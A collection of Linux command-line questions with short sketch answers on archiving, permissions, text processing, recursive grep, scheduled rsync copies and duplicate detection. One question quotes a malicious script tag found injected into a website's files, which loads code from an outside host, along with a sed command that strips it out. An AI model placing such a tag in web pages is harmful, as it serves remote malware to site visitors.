General :: Command Line - Compressing All .pdf Files Recursively (.tar)?
Jun 20, 2011
At the Linux command line, I'd like to compress all .pdf files in a directory, any of its subdirectories and so on - but only .pdf files. I'm struggling to figure out the syntax.
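A minimal sketch, assuming GNU tar: find collects the .pdf paths and tar reads them, NUL-separated, from stdin. The output path /tmp/pdfs.tar.gz is just a placeholder.
Code:
# archive every .pdf under the current directory (GNU tar)
find . -type f -name '*.pdf' -print0 | tar -czvf /tmp/pdfs.tar.gz --null -T -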
How do I get a progress bar on the command line for tar.gz or tar.bz2 when compressing files? I want a progress bar like wget has for downloads, and like you get when you create a tar.gz or tar.bz2 with a GUI.
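tar has no built-in progress bar, but the pv utility (a separate package) can draw one if it is told the total size up front. A sketch, with mydir standing in for the real directory:
Code:
# pipe the tar stream through pv, which needs the total byte count to show percent done
tar -cf - mydir | pv -s "$(du -sb mydir | awk '{print $1}')" | gzip > mydir.tar.gz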
Using chown with "*" as the wildcard does not work on the hidden directories (why?). When I used ".*" as the wildcard it changed all (visible) files, including the parent directory (the one I was currently working in, which is the "dot"). I can change the hidden directories' owner and group using Dolphin, but how is it done from the command line?
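A common workaround: the glob .[!.]* matches hidden entries without matching the special . and .. entries; user:group below stands in for the real owner.
Code:
# hidden entries only; ..?* additionally catches names starting with two dots
chown -R user:group .[!.]* ..?*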
Suppose in my current directory I have 50 sub-directories. Now, I am interested only in about 20 of those sub-directories (whose names match a pattern). I would like to recursively list the contents of these 20 sub-directories. How do I do that? I would like to do this on Solaris 10 and Linux (RHEL 5.x).
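One portable sketch: let the shell expand the pattern and hand the matching directories to ls -R, which recurses into each of them; proj* below is a hypothetical pattern.
Code:
# recursively list every sub-directory whose name starts with "proj"
ls -R proj*/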
I just got an email from Google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed it's in all my .html and .txt files on my website, recursively. Can I make a Linux script to run that will go through all my .html and .txt files recursively and delete that line from them? I don't know how it got into all of them.
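A sketch with find and GNU sed (-i edits in place, so back up first). The dots in the sed pattern stand for the quote characters around the URL, which keeps the shell quoting simple; /var/www is a placeholder for the site root.
Code:
# strip the injected script tag from every .html and .txt file under the site root
find /var/www -type f \( -name '*.html' -o -name '*.txt' \) \
  -exec sed -i 's|<script src=.http://whitepix.info/3.></script>||g' {} +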
I use Linux. I coded a screenshot program some time ago, and now I have 9 GB of screenshots - 60,000 JPEGs, most of which look pretty similar - and I have 300 MB of disk space remaining.
What are some good ways to start compressing batches of them (or all of them) in the background, given the limited space? The problem with compressing the folder all at once is that I wouldn't have enough disk space for that. It seems the process needs to be broken down into chunks. So maybe something like: get a list of all the files; add a chunk of the files (say, 20) to a compressed archive; once it is done and saved successfully, delete that chunk of files.
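A sketch of that exact loop in plain sh, assuming the screenshots sit in one directory and have names without spaces; ~/screenshots and the batch names are placeholders.
Code:
#!/bin/sh
# archive the JPEGs in chunks of 20, deleting each chunk only after tar succeeds
cd ~/screenshots || exit 1
printf '%s\n' *.jpg > /tmp/all.txt       # printf is a builtin, so 60000 names are fine
split -l 20 /tmp/all.txt /tmp/chunk.
i=0
for list in /tmp/chunk.*; do
    i=$((i + 1))
    # -T reads the file list; the && means the originals survive any tar failure
    tar -czf "batch$i.tar.gz" -T "$list" && xargs rm -f < "$list"
done
Since the screenshots are already JPEGs, gzip will gain very little on them; re-encoding at a lower JPEG quality may free far more space than archiving.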
I'm looking for a solution for the following simple problem. I have two files, fileA and fileB. Each file contains only one word per line, and they contain exactly the same number of lines. I would like to create a new file called fileAB, where the i-th line contains the i-th line of fileA, a Tab separator character, and then the i-th line of fileB. I know how to do it in Python or other scripting languages, but it would be nice to have a bash one-liner for that. Is it possible to do this in bash or any other Unix shell, using the tools that are usually available on the command line (e.g., sed, awk and such)?
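This is exactly what paste is for, and its default separator is already a tab:
Code:
paste fileA fileB > fileAB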
I have huge text files with two fields; the first is a string, the second is an integer. The files are sorted by the first field. What I'd like to get in the output is one line per unique string and the sum of the numbers for the identical strings. Some strings appear only once while others appear multiple times. Given the sample data below, for the string glehnia I'd like to get 10+22=32 in the result. How do I do this, either with GnuWin32 command-line tools or in a Linux shell?
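A sketch with awk, which exists both in a Linux shell and as a GnuWin32 tool; it relies only on identical strings being adjacent, which the sort order guarantees (input.txt is a placeholder).
Code:
# print each unique first field once, with the sum of its second fields
awk '$1 != prev { if (NR > 1) print prev, sum; prev = $1; sum = 0 }
     { sum += $2 }
     END { print prev, sum }' input.txt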
I have a large amount of log files that I need to remove sensitive data from. The sensitive data is provided to me in a text file and is prone to change. I had hoped to do the equivalent of this:
[Code]....
The commented-out egrep works fine; the sed doesn't. Am I right to use sed for this? Or is there a more apt route to take?
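The original code block didn't survive in this post, so the following is only a guess at the shape of the task: with one sensitive string per line in patterns.txt, each line can be turned into a sed substitution and the generated script applied to the logs. Both file names are hypothetical, and this breaks if a pattern contains / or other sed metacharacters.
Code:
# turn each pattern line into "s/<pattern>/REDACTED/g", then apply the script
sed 's|.*|s/&/REDACTED/g|' patterns.txt > redact.sed
sed -f redact.sed input.log > clean.log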
How do I access files with spaces from the command line? For example, I want to go to a file called "New File", and let's say it is in Downloads/Books/ (and here is the file). How do I input the space, since the command line doesn't recognize it?
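Either quote the whole name or escape each space with a backslash; tab completion inserts the backslashes automatically.
Code:
cd ~/Downloads/Books
cat "New File"        # quoted
cat New\ File         # escaped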
Let's say I have 20 files named FOOXX, where XX is the number of the file, e.g. 01, 02, etc. At the moment, if I want to delete all files lower than the number 10, this is easy and I just use a wildcard, e.g. rm FOO0*. However, if I want to delete specific files in a range, e.g. 13-15, this becomes more difficult. rm FOO[13-15] does not work, and asks me if I wish to delete all files. Likewise, rm FOO1[3-5] wishes to delete all files that begin with FOO1. So, what is the best way to delete ranges of files like this? I have tried with both bash and zsh, and I don't think they differ much for such a basic task.
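[13-15] doesn't mean what it looks like: square brackets match a single character from a set, not a numeric range. Brace expansion does what is wanted here, identically in bash and zsh.
Code:
# {13..15} expands to 13 14 15 before rm ever runs
rm FOO{13..15}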
This has to also show the line count. I can get it to show the files but not the line count. What is the single command used to identify only the matching count of all lines within files under the /etc directory that contain the word "HOST"? List only the files with matches and suppress any error messages.
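A sketch with GNU grep: -r recurses, -c prints a per-file match count, 2>/dev/null suppresses the error messages, and filtering out the :0 lines leaves only files that actually match.
Code:
grep -rc HOST /etc 2>/dev/null | grep -v ':0$'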
I am using Ubuntu and MySQL. I have a list of many .sql files, like 1.sql, 2.sql, 3.sql ... 100000.sql. I need to insert them into the database. mysql mydb < *.sql gives me: -bash: *.sql: ambiguous redirect.
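A redirection can only name one file, which is why the glob is rejected. Looping over the glob avoids both that and the argument-length limit of handing 100,000 names to a single command:
Code:
# stream every .sql file into mysql in one session
for f in *.sql; do cat "$f"; done | mysql mydb
Note that the glob sorts lexically, so 10.sql comes before 2.sql; if load order matters, zero-pad the names or sort numerically first.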
I have a collection of text files totalling 50 GB. I want to compress these files and store them on DVDs. I'd like to know the currently popular, well-optimized method for compressing the files.
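Plain text compresses extremely well with xz. A sketch that archives, compresses, and cuts the stream into pieces sized for a single-layer DVD, without needing space for an intermediate archive; the names are placeholders.
Code:
# compress hard and split into 4300 MB pieces as the stream is produced
tar -cf - textfiles/ | xz -9 | split -b 4300m - textfiles.tar.xz.part.
# reassemble later with: cat textfiles.tar.xz.part.* | xz -d | tar -xf -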
I want to copy all directories, files, and hidden files and hidden directories with one command. I want these items to replace any same items in the target directory.
I have tried several things, such as:
cp -r *
cp -aR *
but I only seem to get visible files and directories. Obviously, I am missing something. (A brain, probably....)
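The usual trick: * skips dot-files by design, but copying the directory's own "." entry carries everything along, hidden or not, and -a preserves attributes.
Code:
# the trailing /. copies the directory's entire contents, hidden files included
cp -a source/. target/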
I need to copy all subdirectories and files from one directory to another every 5 minutes or so, with the old data automatically being overwritten by the new data. I'd also like this to run at startup. Is there any way this can be done? If so, what program would I need to schedule the automation, and what is the command line I would need?
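cron covers the scheduling and rsync does the copying; a sketch, with /src and /dst as placeholders, installed via crontab -e. The --delete flag is optional and makes the target an exact mirror; @reboot (supported by the common cron implementations) handles the run-at-startup part.
Code:
# run every 5 minutes; -a preserves attributes, --delete removes stale files
*/5 * * * * rsync -a --delete /src/ /dst/
@reboot rsync -a --delete /src/ /dst/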
Write a script that will take a list of filenames as arguments and output a count of how many of them are regular files, and how many of them are scripts (if the file is executable, it will be assumed to be a script file).
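A minimal sh sketch using the -f (regular file) and -x (executable) test operators:
Code:
#!/bin/sh
# count regular files and executable ("script") files among the arguments
regular=0 scripts=0
for f in "$@"; do
    [ -f "$f" ] && regular=$((regular + 1))
    [ -x "$f" ] && scripts=$((scripts + 1))
done
echo "regular files: $regular"
echo "scripts: $scripts"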
If I pass in /home, I would like for it to return 4 files. Or, bonus points if it returns 4 files, 2 directories. Basically, I want the equivalent of right-clicking a folder on Windows and selecting properties and seeing how many files/folders are contained in that folder.
How can I most easily do this? I have a solution involving a Python script I wrote, but why isn't this as easy as running ls | wc or similar?
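It nearly is that easy: find with depth limits keeps the count to the top level, and wc -l counts the results.
Code:
find /home -mindepth 1 -maxdepth 1 -type f | wc -l   # files
find /home -mindepth 1 -maxdepth 1 -type d | wc -l   # directories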
The rm command's man page discusses removing files or directories recursively. So what is meant by deleting a file or directory recursively? And what are some reasons for doing so?
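Recursive deletion means rm descends into the directory and removes everything beneath it (files, subdirectories, and their contents) before removing the directory itself; without -r, rm refuses to touch a non-empty directory. projectdir below is a placeholder.
Code:
rm -r projectdir     # remove projectdir and everything inside it
rm -ri projectdir    # same, but prompt before each removal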
What I would like to do is to print the contents of all text files in a particular directory, recursively. Problem being that there are directories and possibly binaries scattered around in the filesystem as well.
Trying cat * works as long as there are no directories in there, but when there are it gives an error instead and prints nothing.
I'm sure it's easy using file -f or something, but I can't figure it out!
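A sketch built on grep's -I flag, which treats binary files as non-matching: the first -exec acts as a cheap "is this text?" test, and only files that pass get printed.
Code:
# print every text file under the current directory, silently skipping binaries
find . -type f -exec grep -Iq . {} \; -exec cat {} \;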
I'm planning to writing a script to rename files recursively.
Note that I'm using /bin/sh (not /bin/bash), as this is the only shell available in the BusyBox environment of the Linux router (Tomato) I'm using.
Basically, I would like to rename each file with extension .jpg so that its name matches the filename of another file in the very same directory with extension .avi.
The reason for this is that pretty much all DLNA devices, like modern TVs playing .avi files, will display a thumbnail of the video when browsing the filesystem; however, to do so they need a .jpg image with the same filename as the video in the very same directory.
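A BusyBox-compatible sh sketch, under the assumption that each directory holds one video and one cover image (more than one .jpg per directory would need smarter matching); /mnt/media is a placeholder.
Code:
#!/bin/sh
# for every .avi, rename the .jpg sitting next to it to the video's basename
find /mnt/media -name '*.avi' | while read -r avi; do
    dir=$(dirname "$avi")
    base=$(basename "$avi" .avi)
    for jpg in "$dir"/*.jpg; do
        [ -e "$jpg" ] || continue                        # no .jpg in this directory
        [ "$jpg" = "$dir/$base.jpg" ] || mv "$jpg" "$dir/$base.jpg"
        break                                            # assume a single .jpg
    done
done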
I made an account on freeshell.org and it has been very satisfactory so far. I recommend everyone get an account on freeshell.org. But anyway, how do I find files over, for example, 500 KB in my entire shell account?
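find's -size test handles this directly:
Code:
# list every file under the home directory larger than 500 KB
find ~ -type f -size +500k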
I'm a frequent user of grep. I know that I can recursively search a directory using the -r flag:
Code:
# will recursively search all files
grep -r 'some string' *
However, if I want to limit my search to PHP files, the -r flag is suddenly useless:
Code:
# for some reason, this only searches the PHP files in the current dir
grep -r 'some string' *.php
Is there a good way to recursively search a directory and its subdirs for a string but ONLY look at PHP or HTML files (and possibly TXT files too)? I'm really hoping for a nice, short command that doesn't involve using an exclude file and isn't really painful to type. I do this kind of search very frequently and have resorted to either searching EVERY file, which is really slow (TAR and ZIP files really slow it down), or typing repeated commands to search *.php, */*.php, etc.
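The *.php glob only expands in the current directory, so -r never sees the subdirectories. GNU grep has exactly the wanted feature: --include restricts a recursive search to files matching a glob, and it can be given several times.
Code:
# recurse from the current directory, but only open .php, .html and .txt files
grep -r --include='*.php' --include='*.html' --include='*.txt' 'some string' .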
Is there a method at the command line to copy files from one location to another and retain the source files' group and user? I'm migrating some MySQL files from one machine to another. I want to back up the original files in the directory presently. They have owner:group of mysql, some have owner:group root:mysql, and so on. When I copy them under the CLI or in Nautilus, everything changes to root, for I execute sudo cp or gksudo nautilus and copy via the GUI.
Since it is MySQL data I could simply do a dump of the database and restore it on the other machine. But there are about 20 DBs, and I want to do this via a copy, for it will be faster - at least that is what I think.
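When run as root, cp -p (or the stronger -a) preserves ownership, group, permissions and timestamps; rsync -a does the same between machines as long as the receiving end also runs as root. The paths below are the typical MySQL data directory, so adjust to taste.
Code:
# preserve mode, ownership and timestamps while copying as root
sudo cp -a /var/lib/mysql /backup/mysql
# or straight to the other machine, still preserving owner and group
sudo rsync -a /var/lib/mysql/ root@otherhost:/var/lib/mysql/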
I want to recursively list all files in a given directory, with their full path and their timestamps. Something like this:
10:30 Dec 10 2010 /tmp/mydir/myfile
I've tried with:
find . -type f -exec ls -la {} \;
but that doesn't give me the full path.
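Two sketches: starting find from an absolute path makes every printed result absolute, and GNU find's -printf can emit the timestamp in exactly the requested layout.
Code:
# absolute paths come for free when the starting point is absolute
find "$(pwd)" -type f -exec ls -la {} +
# GNU find only: hour:minute, month, day, year, then the full path
find "$(pwd)" -type f -printf '%TH:%TM %Tb %Td %TY %p\n'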
I'm using a Mac, and I just transferred a bunch of photos from another computer; as it turns out, there are a bunch of duplicates. I'm not too familiar with the Mac terminal, but if there is a solution for Linux, it will probably work on the Mac. I just need to be able to recursively scan all folders in my Pictures folder and then delete the duplicates.
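A hedged sketch that only reports duplicates by checksum, since it is safer to eyeball the list before deleting anything; awk keys on the hash in the first column, so spaces in filenames don't matter. macOS ships md5 (its -r flag gives md5sum-style output), while Linux has md5sum.
Code:
# macOS: print the second and later copies of every identical file
find ~/Pictures -type f -exec md5 -r {} + | awk 'seen[$1]++'
# Linux equivalent
find ~/Pictures -type f -exec md5sum {} + | awk 'seen[$1]++'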